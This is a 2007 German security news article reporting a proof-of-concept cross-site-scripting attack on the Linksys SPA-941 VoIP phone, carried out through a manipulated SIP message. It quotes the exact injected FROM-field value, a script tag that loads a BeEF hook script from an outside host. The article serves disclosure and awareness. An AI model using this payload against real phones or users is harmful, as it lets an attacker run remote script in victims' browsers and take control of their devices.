Proof-of-Concept-Schadcode nutzt Buffer Overflow in SIP-Protokoll

VoIP-Steuerungsprotokoll erlaubt Cross Site Scripting und Hacking

16.10.2007 | Redakteur: Stephan Augsten

Der Embedded Web-Server in VoIP-Telefonen wie dem Linksys SPA-941 ermöglicht Cross-Site-Scripting.
Der Embedded Web-Server in VoIP-Telefonen wie dem Linksys SPA-941 ermöglicht Cross-Site-Scripting.

Erstmals sind die Security-Experten von Secure Computing auf einen Proof-of-Concept-Code gestoßen, der eine Cross-Site-Scripting-Attacke über Voice over IP ermöglicht. Die Demoattacke nutzt eine Schwachstelle im Session Initiation Protocol und gibt Hackern die Kontrolle über infiltrierte Endgeräte und PCs.

Auch wenn Angriffsmöglichkeiten und Schwachstellen bei Voice over IP (VoIP) desöfteren entdeckt werden, sind bisher keine Attacken das auf Session Initiation Protocol (SIP) bekannt. Also haben sich die Security-Spezialisten von Packet Storm die Frage gestellt, auf welchem Wege dies am einfachsten zu machen sei.

Als praktikabelste Lösung schwebte den „Freizeit-Hackern“ vor, einen Buffer Overflow zu provozieren – denn deren Existenz im SIP-Stack ist bereits bekannt. Allerdings lassen sich solche Schwachstellen nur schwer ausnutzen, da sie in der Regel eingebettete Systeme betreffen und SIP eigentlich nur dazu dient, die Kommunikationssitzung zwischen Telefonie-Teilnehmern aufzubauen, zu steuern und wieder zu trennen.

Exempel an Internet-Telefon von Linksys statuiert

Nun verfügen allerdings viele VoIP-Geräte über eingebettete Web-Server. Mit deren Hilfe kann der Anwender das Gerät konfigurieren, aber auch Logs zu entgangenen Anrufen und zur Kommunikations-Historie abrufen. Eines dieser Endgeräte ist das VoIP-Telefon Linksys SPA-941. Mithilfe eines manipulierten SIP-Pakets konnte Packet Storm über das Hacking-Tool Beef-Attack einen Cross-Site-Scripting-Angriff (XSS) auf die Maschine des Users starten.

Dafür haben die Security-Experten den Wert

„<script x=‘“ <sip:‘src=‘http://baloo/beef/y.js‘>@192.168.1.9:5060>;tag=1“,

in das “FROM”-Feld der SIP-Nachricht eingetragen. Packet Storm hat den Hersteller Linksys bereits informiert und weist darauf hin, dass auch andere XSS-basierte Attacken über die Schwachstelle ausgeführt werden können.

Paul Henry, Vice President of Technology Evangelism bei Secure Computing, sieht in der Attacke einen Beweis für die neuen Gefahren, die mit dem Web 2.0 einhergehen: „Jeder, der eine VoIP-Verbindung nutzt, sollte deshalb zusätzliche Sicherheitsmaßnahmen ergreifen“. Das Unternehmen empfiehlt eine Security-Lösung, das sämtliche Protokolle auf schädliche Scripts und Schadcodes prüft.

Kommentare werden geladen....

Kommentar zu diesem Artikel

Der Kommentar wird durch einen Redakteur geprüft und in Kürze freigeschaltet.

Anonym mitdiskutieren oder einloggen Anmelden

Avatar
Zur Wahrung unserer Interessen speichern wir zusätzlich zu den o.g. Informationen die IP-Adresse. Dies dient ausschließlich dem Zweck, dass Sie als Urheber des Kommentars identifiziert werden können. Rechtliche Grundlage ist die Wahrung berechtigter Interessen gem. Art 6 Abs 1 lit. f) DSGVO.
  1. Avatar
    Avatar
    Bearbeitet von am
    Bearbeitet von am
    1. Avatar
      Avatar
      Bearbeitet von am
      Bearbeitet von am

Kommentare werden geladen....

Kommentar melden

Melden Sie diesen Kommentar, wenn dieser nicht den Richtlinien entspricht.

Kommentar Freigeben

Der untenstehende Text wird an den Kommentator gesendet, falls dieser eine Email-hinterlegt hat.

Freigabe entfernen

Der untenstehende Text wird an den Kommentator gesendet, falls dieser eine Email-hinterlegt hat.

copyright

Dieser Beitrag ist urheberrechtlich geschützt. Sie wollen ihn für Ihre Zwecke verwenden? Infos finden Sie unter www.mycontentfactory.de (ID: 2008415 / Protokolle und Standards)